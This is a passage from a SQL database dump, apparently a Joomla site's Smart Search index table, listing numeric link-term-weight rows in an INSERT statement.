(174, 215753, 0.93331),
(174, 215754, 1.09669),
(174, 215755, 0.28),
(174, 215756, 0.95669),
(174, 215757, 1.02669),
(174, 215758, 1.07331),
(174, 215759, 1.21331),
(273, 215760, 0.23331),
(306, 215760, 0.23331),
(174, 215760, 1.89981),
(174, 215761, 8.73981),
(174, 215762, 10.26),
(174, 215763, 0.91),
(174, 215764, 1.07331),
(174, 215765, 0.95669),
(174, 215766, 1.09669),
(174, 215767, 0.95669),
(174, 215768, 1.16669),
(174, 215769, 1.05),
(174, 215770, 0.23331),
(174, 215771, 0.91),
(174, 215772, 1.12),
(174, 215773, 1.12),
(174, 215774, 1.23669),
(174, 215775, 1.02669),
(174, 215776, 1.16669),
(174, 215777, 0.91),
(174, 215778, 1.05),
(174, 215779, 0.23331),
(174, 215780, 0.93331),
(174, 215781, 1.12),
(174, 215782, 1.07331),
(174, 215783, 1.14331),
(174, 215784, 0.93331),
(174, 215785, 1.09669),
(174, 215786, 0.98),
(174, 215787, 1.07331),
(174, 215788, 0.91),
(174, 215789, 1.05),
(174, 215790, 0.95669),
(174, 215791, 1.12),
(174, 215792, 0.46669),
(174, 215793, 1.00331),
(174, 215794, 1.26),
(174, 215795, 0.98),
(174, 215796, 1.07331),
(174, 215797, 0.74662),
(174, 215798, 1.00331),
(174, 215799, 1.12),
(174, 215800, 1.00331),
(174, 215801, 1.21331),
(262, 217657, 0.93331),
(268, 217657, 0.93331),
(262, 217668, 0.91),
(267, 217668, 0.91),
(268, 217668, 0.91),
(178, 221216, 0.86331),
(267, 221216, 0.86331),
(178, 221217, 0.95669),
(178, 221218, 1.77338),
(178, 221219, 2.05338),
(178, 221220, 0.88669),
(178, 221221, 1.02669),
(178, 221222, 0.88669),
(178, 221223, 1.05),
(178, 221224, 0.95669),
(178, 221225, 0.93331),
(178, 221226, 0.88669),
(178, 221227, 0.95669),
(178, 221228, 0.84),
(178, 221229, 0.93331),
(178, 221230, 0.95669),
(178, 221231, 1.68),
(178, 221232, 1.00331),
(178, 221233, 1.02669),
(178, 221234, 0.98),
(178, 221235, 1.07331),
(178, 221236, 1.12),
(178, 221237, 1.16669),
(178, 221238, 1.07331),
(178, 221239, 0.93331),
(178, 221240, 1.05),
(178, 221241, 0.91),
(178, 221242, 1.00331),
(178, 221243, 1.02669),
(178, 221244, 1.14331),
(178, 221245, 0.42),
(178, 221246, 1.00331),
(178, 221247, 1.19),
(178, 221248, 0.95669),
(178, 221249, 1.07331),
(178, 221250, 1.00331),
(178, 221251, 1.12),
(178, 221252, 2.05338),
(178, 221253, 1.02669),
(178, 221254, 0.88669),
(178, 221255, 0.95669),
(178, 221256, 0.95669),
(178, 221257, 0.91),
(290, 221257, 0.91),
(178, 221258, 1.05),
(178, 221259, 2.24),
(178, 221260, 0.88669),
(178, 221261, 0.98),
(178, 221262, 0.95669),
(178, 221263, 1.07331),
(178, 221264, 0.86331),
(178, 221265, 1.00331),
(178, 221266, 0.93331),
(178, 221267, 1.02669),
(178, 221268, 0.56),
(178, 221269, 1.77338),
(178, 221270, 1.00331),
(178, 221271, 1.07331),
(178, 221272, 0.79331),
(290, 221272, 0.79331),
(178, 221273, 0.95669),
(178, 221274, 0.88669),
(178, 221275, 0.98),
(178, 221276, 0.98),
(178, 221277, 1.07331),
(178, 221278, 0.93331),
(178, 221279, 1.02669),
(178, 221280, 0.91),
(178, 221281, 1.07331),
(178, 221282, 0.91),
(178, 221283, 0.95669),
(178, 221284, 2.52),
(178, 221285, 0.91),
(178, 221286, 0.95669),
(178, 221287, 0.95669),
(178, 221288, 1.91338),
(178, 221289, 2.14662),
(178, 221290, 0.88669),
(178, 221291, 1.00331),
(178, 221292, 1.05),
(178, 221293, 1.16669),
(178, 221294, 1.19),
(178, 221295, 0.91),
(178, 221296, 1.12),
(178, 221297, 1.05),
(178, 221298, 0.86331),
(265, 221298, 0.86331),
(266, 221298, 0.86331),
(178, 221299, 1.09669),
(178, 221300, 0.88669),
(178, 221301, 0.95669),
(178, 221302, 1.07331),
(178, 221303, 1.07331),
(178, 221304, 0.91),
(178, 221305, 1.02669),
(178, 221306, 0.91),
(178, 221307, 1.02669),
(178, 221308, 1.00331),
(178, 221309, 1.02669),
(178, 221310, 1.07331),
(178, 221311, 1.00331),
(178, 221312, 1.19),
(178, 221313, 0.98),
(178, 221314, 1.07331),
(178, 221315, 0.95669),
(178, 221316, 1.02669),
(178, 221317, 1.09669),
(178, 221318, 1.09669),
(178, 221319, 0.93331),
(178, 221320, 1.00331),
(178, 221321, 0.93331),
(178, 221322, 0.95669),
(178, 221323, 0.91),
(178, 221324, 1.02669),
(178, 221325, 1.00331),
(178, 221326, 1.12),
(178, 221327, 0.91),
(178, 221328, 1.00331),
(178, 221329, 0.93331),
(292, 221329, 0.93331),
(178, 221330, 0.86331),
(273, 221330, 0.86331),
(274, 221330, 0.86331),
(178, 221331, 1.09669),
(178, 221332, 0.88669),
(178, 221333, 0.98),
(178, 221334, 1.05),
(178, 221335, 0.95669),
(178, 221336, 1.00331),
(178, 221337, 1.02669),
(178, 221338, 1.07331),
(178, 221339, 1.07331),
(178, 221340, 1.12),
(178, 221341, 1.02669),
(178, 221342, 1.19),
(178, 221343, 0.95669),
(178, 221344, 1.14331),
(178, 221345, 1.77338),
(178, 221346, 1.14331),
(178, 221347, 0.95669),
(178, 221348, 1.02669),
(178, 221349, 1.09669),
(178, 221350, 0.98),
(306, 221350, 0.98),
(178, 221351, 2.1),
(178, 221352, 2.33338),
(178, 221353, 0.95669),
(178, 221354, 1.21331),
(178, 221355, 1.07331),
(178, 221356, 1.21331),
(178, 221357, 1.00331),
(178, 221358, 1.09669),
(178, 221359, 1.00331),
(178, 221360, 1.07331),
(178, 221361, 0.88669),
(178, 221362, 1.00331),
(178, 221363, 0.93331),
(178, 221364, 1.02669),
(178, 221365, 0.95669),
(178, 221366, 0.93331),
(178, 221367, 1.72662),
(178, 221368, 1.07331),
(178, 221369, 1.00331),
(178, 221370, 0.79331),
(178, 221371, 0.98),
(178, 221372, 1.72662),
(178, 221373, 1.86662),
(178, 221374, 1.05),
(178, 221375, 1.02669),
(178, 221376, 0.98),
(178, 221377, 0.84),
(178, 221378, 0.98),
(178, 221379, 0.86331),
(178, 221380, 1.09669),
(178, 221381, 0.95669),
(178, 221382, 1.02669),
(178, 221383, 0.88669),
(287, 221383, 1.77338),
(178, 221384, 0.93331),
(178, 221385, 0.95669),
(178, 221386, 1.82),
(178, 221387, 0.98),
(178, 221388, 0.98),
(178, 221389, 0.23331),
(178, 221390, 0.86331),
(178, 221391, 0.93331),
(178, 222644, 0.95669),
(178, 222645, 0.95669),
(178, 222646, 2.00662),
(178, 222647, 1.09669),
(178, 222648, 0.91),
(178, 222649, 1.00331),
(178, 222650, 0.46669),
(178, 222651, 1.12),
(178, 222652, 1.19),
(178, 222653, 0.18669),
(178, 222654, 0.91),
(178, 222655, 0.95669),
(178, 222656, 0.84),
(178, 222657, 2.05338),
(178, 222658, 1.09669),
(178, 222659, 1.12),
(178, 222660, 0.86331),
(178, 222661, 0.98),
(178, 222662, 0.91),
(178, 222663, 1.00331),
(178, 222664, 9.69),
(178, 222665, 3.11661),
(178, 222666, 1.05),
(178, 222667, 1.19),
(178, 222668, 0.93331),
(178, 222669, 1.05),
(178, 222670, 0.93331),
(178, 222671, 1.16669),
(178, 222672, 0.84),
(178, 222673, 1.07331),
(178, 222674, 0.91),
(178, 222675, 1.07331),
(178, 222676, 0.7),
(178, 222677, 1.23669),
(178, 222678, 1.37669),
(178, 222679, 0.98),
(178, 222680, 1.09669),
(178, 222681, 0.42),
(178, 222682, 0.98),
(178, 222683, 1.09669),
(178, 222684, 0.86331),
(178, 222685, 1.02669),
(178, 222686, 1.00331),
(178, 222687, 0.98),
(178, 222688, 0.98),
(178, 222689, 0.95669),
(178, 222690, 0.88669),
(178, 222691, 1.05),
(178, 222692, 0.93331),
(178, 222693, 1.05),
(178, 222694, 1.00331),
(178, 222695, 0.93331),
(178, 222696, 1.05),
(178, 222697, 1.07331),
(178, 222698, 1.07331),
(178, 222699, 1.00331),
(178, 222700, 1.12),
(178, 222701, 1.00331),
(178, 222702, 1.05),
(178, 222703, 0.93331),
(178, 222704, 1.05),
(178, 222705, 0.98),
(178, 222706, 1.12),
(178, 222707, 1.05),
(178, 222708, 0.91),
(178, 222709, 1.05),
(178, 222710, 0.95669),
(178, 222711, 1.09669),
(178, 222712, 1.86662),
(178, 222713, 1.05),
(178, 222714, 1.05),
(178, 222715, 0.93331),
(178, 222716, 1.02669),
(178, 222717, 1.02669),
(178, 222718, 1.21331),
(178, 222719, 1.91338),
(178, 222720, 2.19338),
(178, 222721, 1.00331),
(178, 222722, 1.09669),
(178, 222723, 0.86331),
(178, 222724, 0.95669),
(178, 222725, 0.86331),
(178, 222726, 0.95669),
(178, 222727, 1.00331),
(178, 222728, 1.09669),
(178, 222729, 1.09669),
(178, 222730, 1.86662),
(178, 222731, 0.91),
(178, 222732, 0.98),
(178, 222733, 0.98),
(178, 222734, 1.14331),
(178, 222735, 0.98),
(178, 222736, 1.09669),
(178, 222737, 0.18669),
(178, 222738, 0.88669),
(178, 222739, 1.00331),
(178, 222740, 0.84),
(178, 222741, 0.91),
(178, 222742, 1.05),
(178, 222743, 1.16669),
(178, 222744, 0.18669),
(178, 222745, 0.88669),
(178, 222746, 1.05),
(178, 222747, 0.81669),
(178, 222748, 0.86331),
(178, 222749, 0.88669),
(178, 222750, 0.95669),
(178, 222751, 1.86662),
(178, 222752, 1.96),
(178, 222753, 0.93331),
(178, 222754, 1.00331),
(178, 222755, 1.72662),
(178, 222756, 0.95669),
(178, 222757, 0.98),
(267, 222758, 0.28),
(178, 222758, 0.84),
(178, 222759, 0.93331),
(178, 222760, 1.02669),
(178, 222761, 0.91),
(178, 222762, 1.14331),
(178, 222763, 0.95669),
(178, 222764, 1.09669),
(178, 222765, 0.32669),
(178, 222766, 0.93331),
(178, 222767, 1.05),
(178, 222768, 0.74662),
(178, 222769, 0.98),
(178, 222770, 1.07331),
(178, 222771, 0.93331),
(178, 222772, 1.00331),
(178, 222773, 1.05),
(178, 222774, 0.56),
(178, 222775, 1.96),
(178, 222776, 2.38),
(178, 222777, 0.98),
(178, 222778, 1.21331),
(178, 222779, 0.95669),
(178, 222780, 1.02669),
(178, 222781, 0.93331),
(178, 222782, 1.09669),
(178, 222783, 1.09669),
(178, 222784, 1.16669),
(178, 222785, 0.60669),
(178, 222786, 1.12),
(178, 222787, 1.16669),
(178, 222788, 0.51331),
(178, 222789, 1.02669),
(178, 222790, 1.07331),
(178, 222791, 0.95669),
(178, 222792, 1.02669),
(178, 222793, 0.32669),
(178, 222794, 0.93331),
(178, 222795, 1.02669),
(178, 222796, 1.00331),
(178, 222797, 1.09669),
(178, 222798, 1.00331),
(178, 222799, 1.14331),
(178, 222800, 0.42),
(178, 222801, 1.09669),
(178, 222802, 1.14331),
(178, 222803, 0.98),
(178, 222804, 0.95669),
(178, 222805, 1.09669),
(178, 222806, 0.18669),
(178, 222807, 0.88669),
(178, 222808, 0.95669),
(178, 222809, 0.23331),
(178, 222810, 0.93331),
(178, 222811, 1.16669),
(178, 222812, 0.14),
(178, 222813, 0.84),
(178, 222814, 0.95669),
(178, 222815, 0.37331),
(178, 222816, 0.98),
(178, 222817, 1.19),
(178, 222818, 0.98),
(178, 222819, 1.16669),
(263, 227252, 0.91),
(273, 227252, 0.91),
(263, 227253, 1.02669),
(273, 227253, 1.02669),
(263, 227261, 0.95669),
(270, 227261, 0.95669),
(301, 227261, 0.95669),
(264, 232134, 5.3332),
(265, 232134, 5.3332),
(290, 232134, 5.3332),
(305, 232134, 5.3332),
(248, 233715, 0.98),
(269, 233715, 0.98),
(273, 233715, 0.98),
(249, 235764, 0.86331),
(268, 235764, 0.86331),
(249, 235766, 0.18669),
(273, 235766, 0.18669),
(275, 235766, 0.18669),
(290, 235766, 0.18669),
(193, 238124, 2.1),
(193, 238125, 3.00339),
(193, 238126, 1.16669),
(193, 238127, 1.02669),
(193, 238128, 1.14331),
(193, 238129, 0.95669),
(193, 238130, 1.07331);
INSERT INTO `y57u5_finder_links_terms0` (`link_id`, `term_id`, `weight`) VALUES
(270, 238131, 0.88669),
(301, 238131, 0.88669),
(305, 238131, 0.88669),
(193, 238131, 1.77338),
(193, 238132, 2.00662),
(193, 238133, 2.19338),
(193, 238134, 0.88669),
(193, 238135, 1.07331),
(193, 238136, 0.88669),
(193, 238137, 1.09669),
(193, 238138, 0.79331),
(193, 238139, 0.91),
(193, 238140, 0.91),
(193, 238141, 1.07331),
(193, 238142, 0.93331),
(193, 238143, 1.05),
(193, 238144, 0.93331),
(193, 238145, 1.07331),
(193, 238146, 0.88669),
(193, 238147, 0.98),
(193, 238148, 1.77338),
(193, 238149, 0.98),
(193, 238150, 1.21331),
(193, 238151, 0.88669),
(193, 238152, 0.95669),
(193, 238153, 1.77338),
(193, 238154, 0.98),
(193, 238155, 1.02669),
(193, 238156, 0.95669),
(193, 238157, 1.14331),
(193, 238158, 1.77338),
(193, 238159, 0.84),
(193, 238160, 0.93331),
(193, 238161, 0.95669),
(193, 238162, 0.42),
(193, 238163, 0.98),
(193, 238164, 1.07331),
(193, 238165, 1.12),
(193, 238166, 0.95669),
(193, 238167, 1.12),
(193, 238168, 2.05338),
(193, 238169, 2.19338),
(193, 238170, 0.98),
(193, 238171, 1.19),
(193, 238172, 0.32669),
(272, 238172, 0.32669),
(280, 238172, 0.32669),
(305, 238172, 0.32669),
(193, 238173, 0.91),
(193, 238174, 1.00331),
(193, 238175, 1.02669),
(193, 238176, 0.91),
(193, 238177, 0.98),
(193, 238178, 1.00331),
(193, 238179, 1.26),
(193, 238180, 1.09669),
(193, 238181, 1.26),
(193, 238182, 1.00331),
(193, 238183, 0.88669),
(193, 238184, 1.00331),
(193, 238185, 1.00331),
(193, 238186, 1.28331),
(193, 238187, 0.84),
(193, 238188, 0.93331),
(193, 238189, 0.93331),
(193, 238190, 1.12),
(193, 238191, 1.07331),
(193, 238192, 1.14331),
(193, 238193, 1.02669),
(193, 238194, 1.12),
(193, 238195, 0.95669),
(193, 238196, 1.12),
(193, 238197, 0.98),
(193, 238198, 1.07331),
(193, 238199, 1.00331),
(193, 238200, 1.09669),
(193, 238201, 0.93331),
(193, 238202, 1.07331),
(193, 238203, 2.58993),
(193, 238204, 1.96),
(193, 238205, 0.93331),
(193, 238206, 0.95669),
(193, 238207, 1.05),
(193, 238208, 0.95669),
(193, 238209, 1.07331),
(193, 238210, 1.00331),
(193, 238211, 1.09669),
(193, 238212, 0.95669),
(193, 238213, 1.02669),
(193, 238214, 0.84),
(306, 238214, 0.84),
(193, 238215, 1.05),
(193, 238216, 1.05),
(193, 238217, 0.91),
(193, 238218, 1.00331),
(193, 238219, 1.12),
(193, 238220, 0.98),
(193, 238221, 1.05),
(193, 238222, 0.95669),
(193, 238223, 1.05),
(193, 238224, 0.95669),
(193, 238225, 1.19),
(193, 238226, 0.95669),
(193, 238227, 1.02669),
(193, 238228, 0.95669),
(193, 238229, 0.95669),
(193, 238230, 1.07331),
(193, 238231, 1.16669),
(193, 238232, 1.00331),
(193, 238233, 1.12),
(193, 238234, 0.95669),
(193, 238235, 1.02669),
(193, 238236, 0.95669),
(193, 238237, 0.98),
(193, 238238, 1.07331),
(193, 238239, 1.07331),
(193, 238240, 2.05338),
(193, 238241, 0.88669),
(193, 238242, 1.00331),
(193, 238243, 1.02669),
(193, 238244, 1.19),
(193, 238245, 0.95669),
(268, 238245, 0.95669),
(270, 238245, 0.95669),
(301, 238245, 0.95669),
(193, 238246, 1.09669),
(193, 238247, 1.05),
(193, 238248, 1.23669),
(193, 238249, 1.09669),
(193, 238250, 2.05338),
(193, 238251, 1.19),
(193, 238252, 1.14331),
(193, 238253, 0.98),
(193, 238254, 1.09669),
(193, 238255, 1.02669),
(193, 238256, 0.98),
(193, 238257, 0.86331),
(193, 238258, 0.98),
(193, 238259, 1.00331),
(193, 238260, 1.07331),
(193, 238261, 0.98),
(193, 238262, 1.09669),
(193, 238263, 1.00331),
(193, 238264, 1.02669),
(193, 238265, 0.98),
(193, 238266, 1.07331),
(193, 238267, 0.95669),
(304, 238267, 0.95669),
(193, 238268, 1.00331),
(193, 238269, 1.00331),
(193, 238270, 1.05),
(193, 238271, 0.23331),
(193, 238272, 0.88669),
(193, 238273, 1.07331),
(193, 238274, 0.95669),
(193, 238275, 1.05),
(193, 238276, 1.00331),
(193, 238277, 1.07331),
(275, 238278, 0.98),
(270, 238278, 1.96),
(301, 238278, 1.96),
(193, 238278, 2.94),
(193, 238279, 1.00331),
(193, 238280, 0.91),
(193, 238281, 1.12),
(193, 238282, 1.00331),
(193, 238283, 1.07331),
(193, 238284, 1.96),
(193, 238285, 2.24),
(193, 238286, 1.00331),
(193, 239233, 0.98),
(193, 239234, 1.07331),
(193, 239235, 0.93331),
(193, 239236, 1.02669),
(193, 239237, 0.98),
(193, 239238, 1.05),
(193, 239239, 0.86331),
(193, 239240, 0.95669),
(193, 239241, 0.88669),
(193, 239242, 1.00331),
(193, 239243, 0.69993),
(193, 239244, 0.91),
(193, 239245, 1.09669),
(193, 239246, 1.77338),
(193, 239247, 2.00662),
(193, 239248, 1.09669),
(193, 239249, 1.21331),
(193, 239250, 1.92),
(193, 239251, 1.09669),
(193, 239252, 1.21331),
(193, 239253, 0.42),
(193, 239254, 1.00331),
(193, 239255, 1.28331),
(193, 239256, 0.28),
(193, 239257, 0.93331),
(193, 239258, 1.09669),
(193, 239259, 0.32669),
(193, 239260, 0.98),
(193, 239261, 1.12),
(193, 239262, 0.86331),
(193, 239263, 0.95669),
(193, 239264, 0.86331),
(193, 239265, 0.95669),
(193, 239266, 0.91),
(193, 239267, 0.98),
(193, 239268, 0.91),
(193, 239269, 1.09669),
(193, 239270, 0.88669),
(193, 239271, 0.98),
(193, 239272, 0.95669),
(193, 239273, 1.05),
(193, 239274, 0.42),
(306, 239274, 0.42),
(304, 239274, 0.84),
(193, 239275, 1.00331),
(193, 239276, 1.21331),
(193, 239277, 1.09669),
(193, 239278, 1.21331),
(193, 239279, 0.91),
(193, 239280, 0.98),
(193, 239281, 0.98),
(193, 239282, 1.05),
(193, 239283, 0.95669),
(193, 239284, 1.05),
(193, 239285, 0.98),
(193, 239286, 1.09669),
(193, 239287, 0.95669),
(268, 239287, 0.95669),
(193, 239288, 0.98),
(193, 239289, 1.09669),
(193, 239290, 1.12),
(193, 239291, 1.21331),
(193, 239292, 0.84),
(193, 239293, 0.93331),
(193, 239294, 0.81669),
(193, 239295, 1.12),
(193, 239296, 1.07331),
(193, 239297, 1.14331),
(193, 239298, 0.88669),
(193, 239299, 0.95669),
(193, 239300, 1.00331),
(193, 239301, 0.98),
(193, 239302, 1.12),
(193, 239303, 0.95669),
(193, 239304, 1.07331),
(193, 239305, 0.88669),
(193, 239306, 1.12),
(193, 239307, 0.98),
(193, 239308, 1.28331),
(193, 239309, 1.21331),
(193, 239310, 1.19),
(193, 239311, 1.33),
(193, 239312, 0.93331),
(193, 239313, 1.19),
(193, 239314, 0.23331),
(193, 239315, 0.91),
(193, 239316, 1.12),
(193, 239317, 1.00331),
(193, 239318, 1.14331),
(193, 239319, 1.00331),
(193, 239320, 1.14331),
(193, 239321, 2.60661),
(193, 239322, 1.09669),
(193, 239323, 0.91),
(193, 239324, 0.98),
(193, 239325, 0.88669),
(193, 239326, 1.05),
(193, 239327, 1.23669),
(193, 239328, 1.00331),
(193, 239329, 1.16669),
(193, 239330, 0.93331),
(193, 239331, 1.16669),
(193, 239332, 1.00331),
(193, 239333, 1.07331),
(193, 239334, 0.95669),
(193, 239335, 1.14331),
(193, 239336, 0.93331),
(193, 239337, 1.05),
(193, 239338, 1.00331),
(193, 239339, 0.65338),
(193, 239340, 1.86662),
(193, 239341, 2.19338),
(193, 239342, 0.98),
(193, 239343, 1.14331),
(193, 239344, 1.00331),
(193, 239345, 0.28),
(193, 239346, 0.91),
(193, 239347, 1.00331),
(193, 239348, 1.72662),
(193, 239349, 1.86662),
(193, 239350, 1.77338),
(193, 239351, 0.98),
(193, 239352, 0.95669),
(193, 239353, 1.00331),
(193, 239354, 1.12),
(267, 240152, 0.86331),
(274, 240152, 0.86331),
(265, 247324, 0.88669),
(266, 247324, 0.88669),
(268, 247324, 0.88669),
(306, 247324, 0.88669),
(269, 249784, 0.42),
(274, 249784, 2.94),
(270, 250359, 1.00331),
(301, 250359, 1.00331),
(270, 250360, 0.95669),
(301, 250360, 0.95669),
(270, 250361, 1.05),
(301, 250361, 1.05),
(270, 250362, 1.14331),
(301, 250362, 1.14331),
(270, 250363, 0.95669),
(301, 250363, 0.95669),
(270, 250364, 1.07331),
(301, 250364, 1.07331),
(270, 250365, 1.07331),
(301, 250365, 1.07331),
(270, 250366, 1.14331),
(301, 250366, 1.14331),
(270, 250367, 1.19),
(301, 250367, 1.19),
(270, 250368, 0.95669),
(301, 250368, 0.95669),
(270, 250369, 1.05),
(301, 250369, 1.05),
(270, 250370, 1.00331),
(301, 250370, 1.00331),
(270, 250371, 1.07331),
(301, 250371, 1.07331),
(270, 250372, 0.88669),
(301, 250372, 0.88669),
(270, 250373, 0.95669),
(301, 250373, 0.95669),
(270, 250374, 1.00331),
(301, 250374, 1.00331),
(270, 250375, 0.95669),
(301, 250375, 0.95669),
(270, 250376, 1.02669),
(301, 250376, 1.02669),
(270, 250377, 1.00331),
(301, 250377, 1.00331),
(270, 250378, 1.09669),
(301, 250378, 1.09669),
(270, 250379, 0.98),
(301, 250379, 0.98),
(270, 250380, 0.93331),
(301, 250380, 0.93331),
(270, 250381, 1.05),
(301, 250381, 1.05),
(270, 250382, 1.00331),
(301, 250382, 1.00331),
(270, 250383, 1.07331),
(301, 250383, 1.07331),
(270, 250384, 1.00331),
(301, 250384, 1.00331),
(270, 250385, 1.16669),
(301, 250385, 1.16669),
(270, 250386, 1.02669),
(301, 250386, 1.02669),
(270, 250387, 1.09669),
(301, 250387, 1.09669),
(270, 250388, 1.00331),
(301, 250388, 1.00331),
(270, 250389, 1.02669),
(301, 250389, 1.02669),
(270, 250390, 1.16669),
(301, 250390, 1.16669),
(270, 250636, 5.2),
(301, 250636, 5.2),
(270, 250637, 0.98),
(301, 250637, 0.98),
(270, 250638, 0.37331),
(301, 250638, 0.37331),
(270, 250639, 0.98),
(301, 250639, 0.98),
(270, 250640, 1.21331),
(301, 250640, 1.21331),
(270, 250641, 0.86331),
(301, 250641, 0.86331),
(270, 250642, 1.14331),
(301, 250642, 1.14331),
(265, 250929, 1.00331),
(266, 250929, 1.00331),
(265, 250930, 0.88669),
(266, 250930, 0.88669),
(265, 250931, 0.81669),
(266, 250931, 0.81669),
(265, 250932, 0.93331),
(266, 250932, 0.93331),
(265, 250933, 0.95669),
(266, 250933, 0.95669),
(265, 250934, 1.05),
(266, 250934, 1.05),
(265, 250935, 0.93331),
(266, 250935, 0.93331),
(265, 250936, 0.98),
(266, 250936, 0.98),
(265, 250937, 1.00331),
(266, 250937, 1.00331),
(265, 250938, 1.02669),
(266, 250938, 1.02669),
(265, 250939, 1.14331),
(266, 250939, 1.14331),
(265, 250940, 1.26),
(266, 250940, 1.26),
(265, 250941, 1.00331),
(266, 250941, 1.00331),
(265, 250942, 1.12),
(266, 250942, 1.12),
(265, 250943, 1.16669),
(266, 250943, 1.16669),
(265, 250944, 0.88669),
(266, 250944, 0.88669),
(265, 250945, 0.95669),
(266, 250945, 0.95669),
(272, 250946, 0.23331),
(280, 250946, 0.23331),
(265, 250946, 0.46662),
(266, 250946, 0.46662),
(265, 250947, 0.93331),
(266, 250947, 0.93331),
(265, 250948, 1.02669),
(266, 250948, 1.02669),
(265, 250949, 0.93331),
(266, 250949, 0.93331),
(272, 250949, 0.93331),
(280, 250949, 0.93331),
(265, 250950, 1.07331),
(266, 250950, 1.07331),
(265, 250951, 1.05),
(266, 250951, 1.05),
(265, 250952, 1.07331),
(266, 250952, 1.07331),
(265, 250953, 1.05),
(266, 250953, 1.05),
(265, 250954, 1.02669),
(266, 250954, 1.02669),
(265, 250955, 0.95669),
(266, 250955, 0.95669),
(265, 250956, 1.02669),
(266, 250956, 1.02669),
(265, 250957, 0.95669),
(266, 250957, 0.95669),
(265, 250958, 1.07331),
(266, 250958, 1.07331),
(265, 250959, 0.95669),
(266, 250959, 0.95669),
(265, 250960, 1.05),
(266, 250960, 1.05),
(265, 250961, 1.00331),
(266, 250961, 1.00331),
(265, 250962, 1.09669),
(266, 250962, 1.09669),
(265, 250963, 1.23669),
(266, 250963, 1.23669),
(265, 250964, 0.88669),
(266, 250964, 0.88669),
(265, 250965, 0.95669),
(266, 250965, 0.95669),
(265, 250966, 0.93331),
(266, 250966, 0.93331),
(265, 250967, 0.95669),
(266, 250967, 0.95669),
(265, 250968, 0.98),
(266, 250968, 0.98),
(265, 250969, 0.98),
(266, 250969, 0.98),
(265, 250970, 1.09669),
(266, 250970, 1.09669),
(265, 250971, 0.98),
(266, 250971, 0.98),
(265, 250972, 1.16669),
(266, 250972, 1.16669),
(265, 250973, 1.05),
(266, 250973, 1.05),
(265, 250974, 0.91),
(266, 250974, 0.91),
(265, 250975, 1.05),
(266, 250975, 1.05),
(265, 250976, 1.09669),
(266, 250976, 1.09669),
(265, 250977, 1.21331),
(266, 250977, 1.21331),
(265, 250978, 0.98),
(266, 250978, 0.98),
(265, 250979, 1.19),
(266, 250979, 1.19),
(265, 250980, 0.88669),
(266, 250980, 0.88669),
(265, 250981, 1.07331),
(266, 250981, 1.07331),
(265, 250982, 0.95669),
(266, 250982, 0.95669),
(265, 250983, 1.00331),
(266, 250983, 1.00331),
(265, 250984, 1.16669),
(266, 250984, 1.16669),
(265, 251269, 0.86331),
(266, 251269, 0.86331),
(265, 251270, 1.00331),
(266, 251270, 1.00331),
(265, 251271, 0.98),
(266, 251271, 0.98),
(265, 251272, 0.95669),
(266, 251272, 0.95669),
(265, 251273, 1.02669),
(266, 251273, 1.02669),
(265, 251274, 1.19),
(266, 251274, 1.19),
(265, 251275, 0.18669),
(266, 251275, 0.18669),
(265, 251276, 1.09669),
(266, 251276, 1.09669),
(265, 251277, 1.23669),
(266, 251277, 1.23669),
(265, 251278, 0.98),
(266, 251278, 0.98),
(265, 251279, 1.16669),
(266, 251279, 1.16669),
(265, 251280, 1.35331),
(266, 251280, 1.35331),
(265, 251281, 0.51331),
(266, 251281, 0.51331),
(265, 251282, 1.14331),
(266, 251282, 1.14331),
(265, 251283, 1.4),
(266, 251283, 1.4),
(265, 251284, 0.88669),
(266, 251284, 0.88669),
(265, 251285, 1.00331),
(266, 251285, 1.00331),
(265, 251286, 0.88669),
(266, 251286, 0.88669),
(265, 251287, 0.98),
(266, 251287, 0.98),
(265, 251288, 0.88669),
(266, 251288, 0.88669),
(265, 251289, 1.00331),
(266, 251289, 1.00331),
(265, 251290, 0.95669),
(266, 251290, 0.95669),
(265, 251291, 0.93331),
(266, 251291, 0.93331),
(265, 251292, 1.02669),
(266, 251292, 1.02669),
(272, 252983, 0.93331),
(280, 252983, 0.93331),
(272, 252984, 1.07331),
(280, 252984, 1.07331),
(272, 252985, 1.00331),
(280, 252985, 1.00331),
(272, 252986, 1.09669),
(280, 252986, 1.09669),
(272, 252987, 0.86331),
(280, 252987, 0.86331),
(272, 252989, 0.91),
(280, 252989, 0.91),
(272, 252990, 1.00331),
(280, 252990, 1.00331),
(272, 252991, 1.19),
(280, 252991, 1.19),
(272, 252992, 1.30669),
(280, 252992, 1.30669),
(272, 252993, 0.42),
(280, 252993, 0.42),
(272, 252996, 0.42),
(280, 252996, 0.42),
(272, 252997, 1.07331),
(280, 252997, 1.07331),
(272, 252998, 1.14331),
(280, 252998, 1.14331),
(272, 252999, 1.05),
(280, 252999, 1.05),
(272, 253000, 1.26),
(280, 253000, 1.26),
(272, 253001, 0.98),
(280, 253001, 0.98),
(272, 253002, 1.21331),
(280, 253002, 1.21331),
(272, 253003, 0.93331),
(280, 253003, 0.93331),
(272, 253004, 1.05),
(280, 253004, 1.05),
(272, 253005, 1.05),
(280, 253005, 1.05),
(272, 253006, 0.86331),
(280, 253006, 0.86331),
(272, 253007, 0.98),
(280, 253007, 0.98),
(272, 253008, 0.95669),
(280, 253008, 0.95669),
(272, 253009, 1.14331),
(280, 253009, 1.14331),
(272, 253010, 0.98),
(280, 253010, 0.98),
(272, 253011, 1.00331),
(280, 253011, 1.00331),
(272, 253012, 1.14331),
(280, 253012, 1.14331),
(272, 253013, 2.14662),
(280, 253013, 2.14662),
(272, 253014, 2.33338),
(280, 253014, 2.33338),
(272, 253015, 0.95669),
(280, 253015, 0.95669),
(272, 253016, 1.14331),
(280, 253016, 1.14331),
(272, 253017, 0.95669),
(280, 253017, 0.95669),
(272, 253018, 1.07331),
(280, 253018, 1.07331),
(272, 253019, 0.91),
(280, 253019, 0.91),
(272, 253020, 1.02669),
(280, 253020, 1.02669),
(272, 253021, 1.00331),
(280, 253021, 1.00331),
(272, 253022, 1.07331),
(280, 253022, 1.07331),
(272, 253023, 1.00331),
(280, 253023, 1.00331),
(272, 253024, 1.07331),
(280, 253024, 1.07331),
(272, 253025, 0.91),
(280, 253025, 0.91),
(272, 253026, 1.23669),
(280, 253026, 1.23669),
(272, 253027, 0.95669),
(280, 253027, 0.95669),
(272, 253028, 1.14331),
(280, 253028, 1.14331),
(272, 253029, 1.21331),
(280, 253029, 1.21331),
(272, 253030, 0.93331),
(280, 253030, 0.93331),
(272, 253031, 1.23669),
(280, 253031, 1.23669),
(272, 253032, 0.93331),
(280, 253032, 0.93331),
(295, 253032, 0.93331),
(272, 253033, 1.00331),
(280, 253033, 1.00331),
(272, 253034, 0.95669),
(280, 253034, 0.95669),
(272, 253035, 1.19),
